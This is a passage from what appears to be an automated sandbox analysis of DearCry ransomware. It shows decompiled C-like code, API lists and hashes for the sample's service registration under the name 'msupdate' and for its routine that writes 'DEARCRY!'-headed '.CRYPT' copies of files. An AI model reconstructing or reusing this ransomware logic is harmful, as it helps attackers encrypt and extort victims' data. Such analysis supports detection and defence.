                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00B91CAF
                                                              • DeleteService.ADVAPI32(00000000), ref: 00B91CB9
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B91CF7
                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00B91D04
                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00B91D07
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$DeleteManagerStatus
                                                              • String ID: msupdate
                                                              • API String ID: 3691197935-3668653166
                                                              • Opcode ID: 32d727946b742ac3f13db1832a4175e9b9dec4af5e672ce282758c4fa3a0bfed
                                                              • Instruction ID: d1bdd669e06c9d61bb9be064a620c91bb0e08c18199036bfec810ae302f97438
                                                              • Opcode Fuzzy Hash: 32d727946b742ac3f13db1832a4175e9b9dec4af5e672ce282758c4fa3a0bfed
                                                              • Instruction Fuzzy Hash: C4F0C232640220AFC7915B9CFC0DFAF3BA4EB44B56F21006DF608EB2A0CBB54445DB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00B92130(void* __eflags) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				char* _v20;
                                                              				void* _t10;
                                                              				void* _t11;
                                                              				signed int _t12;
                                                              
                                                              				_v12 = 0;
                                                              				_v8 = 0;
                                                              				_v20 = "msupdate";
                                                              				_v16 = 0xb920b0;
                                                              				StartServiceCtrlDispatcherA((_t12 & 0xfffffff8) - 0x10); // executed
                                                              				E00B91D10(_t10, _t11); // executed
                                                              				return 0;
                                                              			}

                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00B92157
                                                                • Part of subcall function 00B91D10: SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B91D60
                                                                • Part of subcall function 00B91D10: _calloc.LIBCMT ref: 00B91D7F
                                                                • Part of subcall function 00B91D10: _calloc.LIBCMT ref: 00B91D91
                                                                • Part of subcall function 00B91D10: _sprintf.LIBCMT ref: 00B91DB7
                                                                • Part of subcall function 00B91D10: _memset.LIBCMT ref: 00B91DDB
                                                                • Part of subcall function 00B91D10: _getenv.LIBCMT ref: 00B91DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Service_calloc$CtrlDispatcherStartStatus_getenv_memset_sprintf
                                                              • String ID: msupdate
                                                              • API String ID: 3495658242-3668653166
                                                              • Opcode ID: bce472a916451ea2b4466cfb5eff53bf406c664cc63425b5c2ddccd02e47ae04
                                                              • Instruction ID: 63469c78dbc92eba2794fa6175ed4eb5947b687bf2814ee1ec5df824e43d2d2a
                                                              • Opcode Fuzzy Hash: bce472a916451ea2b4466cfb5eff53bf406c664cc63425b5c2ddccd02e47ae04
                                                              • Instruction Fuzzy Hash: 00E0ECB14182045E8790FF78C90624ABBE8DA44214F10CEBEA4ACC2250EA7095159B97
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E00B91231(void* __ebx, void* __edi) {
                                                              				void* __esi;
                                                              				signed int _t62;
                                                              				intOrPtr _t71;
                                                              				intOrPtr _t81;
                                                              				intOrPtr _t86;
                                                              				intOrPtr _t94;
                                                              				void* _t98;
                                                              				intOrPtr _t100;
                                                              				intOrPtr _t103;
                                                              				intOrPtr _t106;
                                                              				void* _t110;
                                                              				intOrPtr _t112;
                                                              				void* _t119;
                                                              				intOrPtr _t121;
                                                              				intOrPtr _t122;
                                                              				intOrPtr _t133;
                                                              				intOrPtr _t139;
                                                              				void* _t144;
                                                              				intOrPtr _t147;
                                                              				intOrPtr _t148;
                                                              				void* _t149;
                                                              				CHAR* _t150;
                                                              				void* _t151;
                                                              				signed int _t152;
                                                              				void* _t154;
                                                              				void* _t158;
                                                              				intOrPtr _t159;
                                                              				void* _t160;
                                                              				signed int _t161;
                                                              				void* _t163;
                                                              				void* _t164;
                                                              				void* _t165;
                                                              				void* _t166;
                                                              				void* _t167;
                                                              
                                                              				_t143 = __edi;
                                                              				lstrcpynA(_t160 + 0xb8, _t150, 0x50c);
                                                              				lstrcatA(_t160 + 0xb4, ".CRYPT");
                                                              				_t62 = L00C6A96D(_t150, "rb+"); // executed
                                                              				_t161 = _t160 + 8;
                                                              				 *(_t161 + 0x14) = _t62;
                                                              				if(_t62 == __edi) {
                                                              					L31:
                                                              					_t63 = _t62 | 0xffffffff;
                                                              				} else {
                                                              					_t137 = _t161 + 0xb0;
                                                              					_t62 = L00C6A96D(_t161 + 0xb0, "wb"); // executed
                                                              					_t152 = _t62;
                                                              					_t161 = _t161 + 8;
                                                              					_t169 = _t152 - __edi;
                                                              					if(_t152 == __edi) {
                                                              						goto L31;
                                                              					} else {
                                                              						 *((char*)(_t161 + 0x88)) = 0;
                                                              						E00C6BB40(__edi, _t161 + 0x81, __edi, 0x30);
                                                              						_push(0x30);
                                                              						_push(_t161 + 0x88);
                                                              						E00B96FF0();
                                                              						_push(_t152);
                                                              						_push(8);
                                                              						_push(1);
                                                              						_push("DEARCRY!"); // executed
                                                              						E00C6ADA3(__ebx, _t137, _t143, _t152, _t169); // executed
                                                              						_t8 = E00B970E0(_t137, _t169, _t154) + 1; // 0x1
                                                              						_t120 = _t8;
                                                              						_t145 = E00C6A294(_t8, _t137, _t143, _t8);
                                                              						_t71 = E00C6BB40(_t145, _t145, 0, _t120);
                                                              						_push(1);
                                                              						_push(_t154);
                                                              						_push(_t145);
                                                              						_t138 = _t161 + 0xc0;
                                                              						_push(_t161 + 0xc0);
                                                              						E00B97100(0x30);
                                                              						_t163 = _t161 + 0x4c;
                                                              						 *((intOrPtr*)(_t163 + 0x24)) = _t71;
                                                              						_t170 = _t71;
                                                              						if(_t71 >= 0) {
                                                              							_push(_t152);
                                                              							_push(4);
                                                              							_push(1);
                                                              							_push(_t163 + 0x2c);
                                                              							E00C6ADA3(_t120, _t138, _t145, _t152, __eflags);
                                                              							_t139 =  *((intOrPtr*)(_t163 + 0x34));
                                                              							_push(_t152);
                                                              							_push(_t139);
                                                              							_push(1);
                                                              							_push(_t145);
                                                              							E00C6ADA3(_t120, _t139, _t145, _t152, __eflags);
                                                              							asm("cdq");
                                                              							_t120 = _t139;
                                                              							_push(_t145);
                                                              							asm("adc ebx, 0x0");
                                                              							E00C69CB2(_t120, _t139, _t145, _t152, __eflags);
                                                              							_push(_t152);
                                                              							_push(4);
                                                              							_push(1);
                                                              							_push(_t163 + 0x68);
                                                              							 *((intOrPtr*)(_t163 + 0x70)) = 4;
                                                              							E00C6ADA3(_t120, _t139, _t145, _t152, __eflags);
                                                              							_t140 =  *((intOrPtr*)(_t163 + 0x60));
                                                              							E00C69E5A( *((intOrPtr*)(_t163 + 0x60)),  *((intOrPtr*)(_t163 + 0x60)), _t163 + 0x74); // executed
                                                              							_push(_t152);
                                                              							_push(8);
                                                              							_push(1);
                                                              							_push(_t163 + 0x9c);
                                                              							E00C6ADA3(_t120,  *((intOrPtr*)(_t163 + 0x60)), _t145, _t152, __eflags);
                                                              							_t164 = _t163 + 0x4c;
                                                              							_t158 =  *((intOrPtr*)(_t163 + 0x44)) + 0x18;
                                                              							asm("adc ebx, 0x0");
                                                              							_t81 = E00B95990();
                                                              							_t146 = _t81;
                                                              							 *((intOrPtr*)(_t164 + 0x38)) = _t81;
                                                              							E00B96270(_t140, _t81, E00B92F00(), 0, 0, 0, 1);
                                                              							_t137 = _t164 + 0x9c;
                                                              							E00B96270(_t164 + 0x9c, _t146, 0, 0, _t164 + 0x9c, _t164 + 0xb8, 1);
                                                              							_t86 = E00C6AC24( *((intOrPtr*)(_t164 + 0x60)), 1, 0x100000,  *((intOrPtr*)(_t164 + 0x44))); // executed
                                                              							_t147 = _t86;
                                                              							_t165 = _t164 + 0x40;
                                                              							__eflags = _t147;
                                                              							if(__eflags <= 0) {
                                                              								L8:
                                                              								_t121 =  *((intOrPtr*)(_t165 + 0x20));
                                                              								_t148 =  *((intOrPtr*)(_t165 + 0x28));
                                                              								E00B96580(_t148, _t121, _t165 + 0x10);
                                                              								_push(_t152);
                                                              								_push( *((intOrPtr*)(_t165 + 0x1c)));
                                                              								_push(1);
                                                              								_push(_t121);
                                                              								E00C6ADA3(_t121, _t137, _t148, _t152, __eflags);
                                                              								E00B95920(_t137, _t148, _t148);
                                                              								_push(_t148);
                                                              								E00C69CB2(_t121, _t137, _t148, _t152, __eflags);
                                                              								_push(_t152); // executed
                                                              								E00C6B1A7(_t121, _t137, _t148, _t152, __eflags); // executed
                                                              								_t159 =  *((intOrPtr*)(_t165 + 0x3c));
                                                              								_push(0);
                                                              								_push(0);
                                                              								_push(0);
                                                              								_push(_t159); // executed
                                                              								E00C6A637(_t121, _t137, _t148, _t152, __eflags); // executed
                                                              								_t122 =  *((intOrPtr*)(_t165 + 0x54));
                                                              								_t166 = _t165 + 0x38;
                                                              								__eflags = _t122;
                                                              								if(__eflags < 0) {
                                                              									L12:
                                                              									_t94 =  *((intOrPtr*)(_t166 + 0x18));
                                                              								} else {
                                                              									if(__eflags > 0) {
                                                              										L11:
                                                              										_t94 = 0x100000;
                                                              									} else {
                                                              										__eflags =  *((intOrPtr*)(_t166 + 0x18)) - 0x100000;
                                                              										if( *((intOrPtr*)(_t166 + 0x18)) <= 0x100000) {
                                                              											goto L12;
                                                              										} else {
                                                              											goto L11;
                                                              										}
                                                              									}
                                                              								}
                                                              								_t149 = 0;
                                                              								 *((intOrPtr*)(_t166 + 0x10)) = _t94;
                                                              								__eflags = _t122;
                                                              								if(__eflags >= 0) {
                                                              									if(__eflags > 0) {
                                                              										goto L18;
                                                              									} else {
                                                              										__eflags =  *((intOrPtr*)(_t166 + 0x18));
                                                              										if(__eflags > 0) {
                                                              											while(1) {
                                                              												L18:
                                                              												__eflags = _t94;
                                                              												if(__eflags < 0) {
                                                              													_t94 = 0x100000;
                                                              													 *((intOrPtr*)(_t166 + 0x10)) = 0x100000;
                                                              												}
                                                              												_push(_t159);
                                                              												_push(_t94);
                                                              												_push(1);
                                                              												_push(0xcc9fb0); // executed
                                                              												_t98 = E00C6ADA3(_t122, _t137, _t149, 0, __eflags); // executed
                                                              												asm("cdq");
                                                              												_t167 = _t166 + 0x10;
                                                              												_t149 = _t149 + _t98;
                                                              												asm("adc esi, edx");
                                                              												_t100 =  *((intOrPtr*)(_t167 + 0x18)) - _t149;
                                                              												__eflags = _t100;
                                                              												_t137 = _t122;
                                                              												asm("sbb edx, esi");
                                                              												 *((intOrPtr*)(_t167 + 0x34)) = _t122;
                                                              												if(__eflags < 0) {
                                                              													L24:
                                                              													 *((intOrPtr*)(_t167 + 0x10)) = _t100;
                                                              												} else {
                                                              													if(__eflags > 0) {
                                                              														L23:
                                                              														 *((intOrPtr*)(_t167 + 0x10)) = 0x100000;
                                                              													} else {
                                                              														__eflags = _t100 - 0x100000;
                                                              														if(__eflags <= 0) {
                                                              															goto L24;
                                                              														} else {
                                                              															goto L23;
                                                              														}
                                                              													}
                                                              												}
                                                              												_push(0);
                                                              												_push(0);
                                                              												_push(_t149);
                                                              												_push(_t159); // executed
                                                              												E00C6A637(_t122, _t137, _t149, 0, __eflags); // executed
                                                              												_t166 = _t167 + 0x10;
                                                              												__eflags = 0 - _t122;
                                                              												if(__eflags < 0) {
                                                              													L17:
                                                              													_t94 =  *((intOrPtr*)(_t166 + 0x10));
                                                              													continue;
                                                              												}
                                                              												if(__eflags <= 0) {
                                                              													__eflags = _t149 -  *((intOrPtr*)(_t166 + 0x18));
                                                              													if(__eflags < 0) {
                                                              														goto L17;
                                                              													}
                                                              												}
                                                              												goto L28;
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								L28:
                                                              								_push(_t159);
                                                              								E00C6B1A7(_t122, _t137, _t149, 0, __eflags);
                                                              								E00C6A686( *((intOrPtr*)(_t166 + 0x30))); // executed
                                                              								_t161 = _t166 + 8;
                                                              								_t63 = 0;
                                                              							} else {
                                                              								while(1) {
                                                              									asm("cdq");
                                                              									_t133 =  *((intOrPtr*)(_t165 + 0x18)) + _t147;
                                                              									_t103 =  *((intOrPtr*)(_t165 + 0x1c));
                                                              									asm("adc eax, edx");
                                                              									_push(0);
                                                              									_push(_t103);
                                                              									_push(_t133);
                                                              									 *((intOrPtr*)(_t165 + 0x28)) = _t133;
                                                              									 *((intOrPtr*)(_t165 + 0x2c)) = _t103;
                                                              									E00C6A637(_t120,  *((intOrPtr*)(_t165 + 0x14)), _t147, _t152, __eflags); // executed
                                                              									_t142 =  *((intOrPtr*)(_t165 + 0x38));
                                                              									_t145 =  *((intOrPtr*)(_t165 + 0x44));
                                                              									_t106 = E00B96560( *((intOrPtr*)(_t165 + 0x38)),  *((intOrPtr*)(_t165 + 0x38)),  *((intOrPtr*)(_t165 + 0x30)), _t165 + 0x28,  *((intOrPtr*)(_t165 + 0x44)), _t147,  *((intOrPtr*)(_t165 + 0x14)));
                                                              									_t163 = _t165 + 0x24;
                                                              									__eflags = _t106;
                                                              									if(__eflags == 0) {
                                                              										break;
                                                              									}
                                                              									_push(_t152);
                                                              									_push( *((intOrPtr*)(_t163 + 0x10)));
                                                              									_push(1);
                                                              									_push( *((intOrPtr*)(_t163 + 0x20))); // executed
                                                              									_t110 = E00C6ADA3(_t120, _t142, _t145, _t152, __eflags); // executed
                                                              									asm("cdq");
                                                              									_t158 = _t158 + _t110;
                                                              									_push(0);
                                                              									asm("adc ebx, edx");
                                                              									_push(_t120);
                                                              									_push(_t158);
                                                              									_push(_t152); // executed
                                                              									E00C6A637(_t120, _t142, _t145, _t152, __eflags); // executed
                                                              									_t137 =  *((intOrPtr*)(_t163 + 0x34));
                                                              									_t112 = E00C6AC24(_t145, 1, 0x100000,  *((intOrPtr*)(_t163 + 0x34))); // executed
                                                              									_t147 = _t112;
                                                              									_t165 = _t163 + 0x30;
                                                              									__eflags = _t147;
                                                              									if(__eflags > 0) {
                                                              										continue;
                                                              									} else {
                                                              										goto L8;
                                                              									}
                                                              									goto L32;
                                                              								}
                                                              								E00B959B0(_t145,  *((intOrPtr*)(_t163 + 0x28)));
                                                              								_push(_t152);
                                                              								E00C6B1A7(_t120, _t142, _t145, _t152, __eflags);
                                                              								_t137 =  *((intOrPtr*)(_t163 + 0x1c));
                                                              								_push( *((intOrPtr*)(_t163 + 0x1c)));
                                                              								goto L30;
                                                              							}
                                                              						} else {
                                                              							E00B967B0(_t120, _t145, _t154, E00C6A3E6() + 0x20);
                                                              							_push(_t152);
                                                              							E00C6B1A7(_t120, _t138, _t145, _t152, _t170);
                                                              							_push( *((intOrPtr*)(_t163 + 0x1c)));
                                                              							L30:
                                                              							_t62 = E00C6B1A7(_t120, _t137, _t145, _t152, _t170);
                                                              							_t161 = _t163 + 0xc;
                                                              							goto L31;
                                                              						}
                                                              					}
                                                              				}
                                                              				L32:
                                                              				_pop(_t144);
                                                              				_pop(_t151);
                                                              				_pop(_t119);
                                                              				return E00C69C26(_t63, _t119,  *(_t161 + 0x5cc) ^ _t161, _t137, _t144, _t151);
                                                              			}
                                                              0x00b9136d
                                                              0x00b9136e
                                                              0x00b91376
                                                              0x00b9137b
                                                              0x00b91385
                                                              0x00b9138a
                                                              0x00b9138b
                                                              0x00b91394
                                                              0x00b91396
                                                              0x00b91397
                                                              0x00b9139c
                                                              0x00b9139f
                                                              0x00b913a2
                                                              0x00b913a5
                                                              0x00b913ae
                                                              0x00b913b4
                                                              0x00b913bf
                                                              0x00b913ce
                                                              0x00b913db
                                                              0x00b913f1
                                                              0x00b913f6
                                                              0x00b913f8
                                                              0x00b913fb
                                                              0x00b913fd
                                                              0x00b9148d
                                                              0x00b9148d
                                                              0x00b91491
                                                              0x00b9149c
                                                              0x00b914a5
                                                              0x00b914a6
                                                              0x00b914a7
                                                              0x00b914a9
                                                              0x00b914aa
                                                              0x00b914b0
                                                              0x00b914b5
                                                              0x00b914b6
                                                              0x00b914bb
                                                              0x00b914bc
                                                              0x00b914c1
                                                              0x00b914c5
                                                              0x00b914c7
                                                              0x00b914c9
                                                              0x00b914cb
                                                              0x00b914cc
                                                              0x00b914d1
                                                              0x00b914d5
                                                              0x00b914d8
                                                              0x00b914da
                                                              0x00b914ef
                                                              0x00b914ef
                                                              0x00b914dc
                                                              0x00b914dc
                                                              0x00b914e8
                                                              0x00b914e8
                                                              0x00b914de
                                                              0x00b914de
                                                              0x00b914e6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b914e6
                                                              0x00b914dc
                                                              0x00b914f3
                                                              0x00b914f7
                                                              0x00b914fb
                                                              0x00b914fd
                                                              0x00b914ff
                                                              0x00000000
                                                              0x00b91501
                                                              0x00b91501
                                                              0x00b91505
                                                              0x00b91514
                                                              0x00b91514
                                                              0x00b91514
                                                              0x00b91516
                                                              0x00b91518
                                                              0x00b9151d
                                                              0x00b9151d
                                                              0x00b91521
                                                              0x00b91522
                                                              0x00b91523
                                                              0x00b91525
                                                              0x00b9152a
                                                              0x00b9152f
                                                              0x00b91530
                                                              0x00b91533
                                                              0x00b91539
                                                              0x00b9153b
                                                              0x00b9153b
                                                              0x00b9153d
                                                              0x00b9153f
                                                              0x00b91541
                                                              0x00b91545
                                                              0x00b9155a
                                                              0x00b9155a
                                                              0x00b91547
                                                              0x00b91547
                                                              0x00b91550
                                                              0x00b91550
                                                              0x00b91549
                                                              0x00b91549
                                                              0x00b9154e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9154e
                                                              0x00b91547
                                                              0x00b9155e
                                                              0x00b91560
                                                              0x00b91561
                                                              0x00b91562
                                                              0x00b91563
                                                              0x00b91568
                                                              0x00b9156b
                                                              0x00b9156d
                                                              0x00b91510
                                                              0x00b91510
                                                              0x00000000
                                                              0x00b91510
                                                              0x00b9156f
                                                              0x00b91571
                                                              0x00b91575
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91575
                                                              0x00000000
                                                              0x00b9156f
                                                              0x00b91514
                                                              0x00b91505
                                                              0x00b914ff
                                                              0x00b91577
                                                              0x00b91577
                                                              0x00b91578
                                                              0x00b91582
                                                              0x00b91587
                                                              0x00b9158a
                                                              0x00b91403
                                                              0x00b91403
                                                              0x00b91409
                                                              0x00b9140a
                                                              0x00b9140c
                                                              0x00b91410
                                                              0x00b91416
                                                              0x00b91418
                                                              0x00b91419
                                                              0x00b9141b
                                                              0x00b9141f
                                                              0x00b91423
                                                              0x00b9142c
                                                              0x00b91431
                                                              0x00b9143d
                                                              0x00b91442
                                                              0x00b91445
                                                              0x00b91447
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91455
                                                              0x00b91456
                                                              0x00b91457
                                                              0x00b91459
                                                              0x00b9145a
                                                              0x00b9145f
                                                              0x00b91460
                                                              0x00b91462
                                                              0x00b91464
                                                              0x00b91466
                                                              0x00b91467
                                                              0x00b91468
                                                              0x00b91469
                                                              0x00b9146e
                                                              0x00b9147b
                                                              0x00b91480
                                                              0x00b91482
                                                              0x00b91485
                                                              0x00b91487
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91487
                                                              0x00b91593
                                                              0x00b91598
                                                              0x00b91599
                                                              0x00b9159e
                                                              0x00b915a2
                                                              0x00000000
                                                              0x00b915a2
                                                              0x00b91314
                                                              0x00b9131d
                                                              0x00b91322
                                                              0x00b91323
                                                              0x00b9132c
                                                              0x00b915a3
                                                              0x00b915a3
                                                              0x00b915a8
                                                              0x00000000
                                                              0x00b915a8
                                                              0x00b91312
                                                              0x00b912a0
                                                              0x00b915ae
                                                              0x00b915b5
                                                              0x00b915b6
                                                              0x00b915b8
                                                              0x00b915c6

                                                              APIs
                                                              • lstrcpynA.KERNEL32(?), ref: 00B91254
                                                              • lstrcatA.KERNEL32(?,.CRYPT), ref: 00B91267
                                                              • _memset.LIBCMT ref: 00B912B9
                                                              • _malloc.LIBCMT ref: 00B912E6
                                                                • Part of subcall function 00C6A294: __FF_MSGBANNER.LIBCMT ref: 00C6A2B7
                                                                • Part of subcall function 00C6A294: __NMSG_WRITE.LIBCMT ref: 00C6A2BE
                                                                • Part of subcall function 00C6A294: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00C716F3,?,00000001,?,?,00C6FCCA,00000018,00CBFCA8,0000000C,00C6FD5B), ref: 00C6A30B
                                                              • _memset.LIBCMT ref: 00B912F1
                                                              • __stat64.LIBCMT ref: 00B91385
                                                              • __fread_nolock.LIBCMT ref: 00B913F1
                                                                • Part of subcall function 00C6B1A7: __lock_file.LIBCMT ref: 00C6B1F7
                                                                • Part of subcall function 00C6B1A7: __fclose_nolock.LIBCMT ref: 00C6B201
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _memset$AllocateHeap__fclose_nolock__fread_nolock__lock_file__stat64_malloclstrcatlstrcpyn
                                                              • String ID: .CRYPT$DEARCRY!$rb+
                                                              • API String ID: 3584694502-2391147945
                                                              • Opcode ID: d80be42e3db7f9423c05e96634e3f40ca5ad9d12b83c9ed055dbd51be9f38576
                                                              • Instruction ID: b59604bf30d7f2ac75c8060e54ae62e359d0a34f8891479ca7c2b223b3041c53
                                                              • Opcode Fuzzy Hash: d80be42e3db7f9423c05e96634e3f40ca5ad9d12b83c9ed055dbd51be9f38576
                                                              • Instruction Fuzzy Hash: B091D3716443017BE620EB64CCC2F6FB6E9AFC4B40F05492CF645A6281DBB1E9059B63
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E00C6A984(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                              				signed int _v8;
                                                              				char* _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				signed int _t90;
                                                              				intOrPtr* _t92;
                                                              				signed int _t94;
                                                              				char _t97;
                                                              				signed int _t105;
                                                              				void* _t106;
                                                              				signed int _t107;
                                                              				signed int _t110;
                                                              				signed int _t113;
                                                              				intOrPtr* _t114;
                                                              				signed int _t118;
                                                              				signed int _t119;
                                                              				signed int _t120;
                                                              				char* _t121;
                                                              				signed int _t125;
                                                              				signed int _t131;
                                                              				signed int _t133;
                                                              				void* _t134;
                                                              
                                                              				_t125 = __edx;
                                                              				_t121 = _a4;
                                                              				_t119 = _a8;
                                                              				_t131 = 0;
                                                              				_v12 = _t121;
                                                              				_v8 = _t119;
                                                              				if(_a12 == 0 || _a16 == 0) {
                                                              					L5:
                                                              					return 0;
                                                              				} else {
                                                              					_t138 = _t121;
                                                              					if(_t121 != 0) {
                                                              						_t133 = _a20;
                                                              						__eflags = _t133;
                                                              						if(_t133 == 0) {
                                                              							L9:
                                                              							__eflags = _t119 - 0xffffffff;
                                                              							if(_t119 != 0xffffffff) {
                                                              								_t90 = E00C6BB40(_t131, _t121, _t131, _t119);
                                                              								_t134 = _t134 + 0xc;
                                                              							}
                                                              							__eflags = _t133 - _t131;
                                                              							if(__eflags == 0) {
                                                              								goto L3;
                                                              							} else {
                                                              								_t94 = _t90 | 0xffffffff;
                                                              								_t125 = _t94 % _a12;
                                                              								__eflags = _a16 - _t94 / _a12;
                                                              								if(__eflags > 0) {
                                                              									goto L3;
                                                              								}
                                                              								L13:
                                                              								_t131 = _a12 * _a16;
                                                              								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                              								_v20 = _t131;
                                                              								_t120 = _t131;
                                                              								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                              									_v16 = 0x1000;
                                                              								} else {
                                                              									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                              								}
                                                              								__eflags = _t131;
                                                              								if(_t131 == 0) {
                                                              									L40:
                                                              									return _a16;
                                                              								} else {
                                                              									do {
                                                              										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                              										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                              											L24:
                                                              											__eflags = _t120 - _v16;
                                                              											if(_t120 < _v16) {
                                                              												_t97 = E00C723C3(_t120, _t125, _t133); // executed
                                                              												__eflags = _t97 - 0xffffffff;
                                                              												if(_t97 == 0xffffffff) {
                                                              													L48:
                                                              													return (_t131 - _t120) / _a12;
                                                              												}
                                                              												__eflags = _v8;
                                                              												if(_v8 == 0) {
                                                              													L44:
                                                              													__eflags = _a8 - 0xffffffff;
                                                              													if(__eflags != 0) {
                                                              														E00C6BB40(_t131, _a4, 0, _a8);
                                                              														_t134 = _t134 + 0xc;
                                                              													}
                                                              													 *((intOrPtr*)(E00C6D8C9(__eflags))) = 0x22;
                                                              													_push(0);
                                                              													_push(0);
                                                              													_push(0);
                                                              													_push(0);
                                                              													_push(0);
                                                              													L4:
                                                              													E00C6FB6E(_t125, _t131, _t133);
                                                              													goto L5;
                                                              												}
                                                              												_t123 = _v12;
                                                              												_v12 = _v12 + 1;
                                                              												 *_v12 = _t97;
                                                              												_t120 = _t120 - 1;
                                                              												_t70 =  &_v8;
                                                              												 *_t70 = _v8 - 1;
                                                              												__eflags =  *_t70;
                                                              												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                              												goto L39;
                                                              											}
                                                              											__eflags = _v16;
                                                              											if(_v16 == 0) {
                                                              												_t105 = 0x7fffffff;
                                                              												__eflags = _t120 - 0x7fffffff;
                                                              												if(_t120 <= 0x7fffffff) {
                                                              													_t105 = _t120;
                                                              												}
                                                              											} else {
                                                              												__eflags = _t120 - 0x7fffffff;
                                                              												if(_t120 <= 0x7fffffff) {
                                                              													_t55 = _t120 % _v16;
                                                              													__eflags = _t55;
                                                              													_t125 = _t55;
                                                              													_t110 = _t120;
                                                              												} else {
                                                              													_t125 = 0x7fffffff % _v16;
                                                              													_t110 = 0x7fffffff;
                                                              												}
                                                              												_t105 = _t110 - _t125;
                                                              											}
                                                              											__eflags = _t105 - _v8;
                                                              											if(_t105 > _v8) {
                                                              												goto L44;
                                                              											} else {
                                                              												_push(_t105);
                                                              												_push(_v12);
                                                              												_t106 = E00C6D3F3(_t133);
                                                              												_pop(_t123);
                                                              												_push(_t106); // executed
                                                              												_t107 = E00C72AB0(_t120, _t125, _t131, _t133, __eflags); // executed
                                                              												_t134 = _t134 + 0xc;
                                                              												__eflags = _t107;
                                                              												if(_t107 == 0) {
                                                              													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                              													goto L48;
                                                              												}
                                                              												__eflags = _t107 - 0xffffffff;
                                                              												if(_t107 == 0xffffffff) {
                                                              													L47:
                                                              													_t80 = _t133 + 0xc;
                                                              													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                              													__eflags =  *_t80;
                                                              													goto L48;
                                                              												}
                                                              												_v12 = _v12 + _t107;
                                                              												_t120 = _t120 - _t107;
                                                              												_v8 = _v8 - _t107;
                                                              												goto L39;
                                                              											}
                                                              										}
                                                              										_t113 =  *(_t133 + 4);
                                                              										__eflags = _t113;
                                                              										if(__eflags == 0) {
                                                              											goto L24;
                                                              										}
                                                              										if(__eflags < 0) {
                                                              											goto L47;
                                                              										}
                                                              										_t131 = _t120;
                                                              										__eflags = _t120 - _t113;
                                                              										if(_t120 >= _t113) {
                                                              											_t131 = _t113;
                                                              										}
                                                              										__eflags = _t131 - _v8;
                                                              										if(_t131 > _v8) {
                                                              											_t133 = 0;
                                                              											__eflags = _a8 - 0xffffffff;
                                                              											if(__eflags != 0) {
                                                              												E00C6BB40(_t131, _a4, 0, _a8);
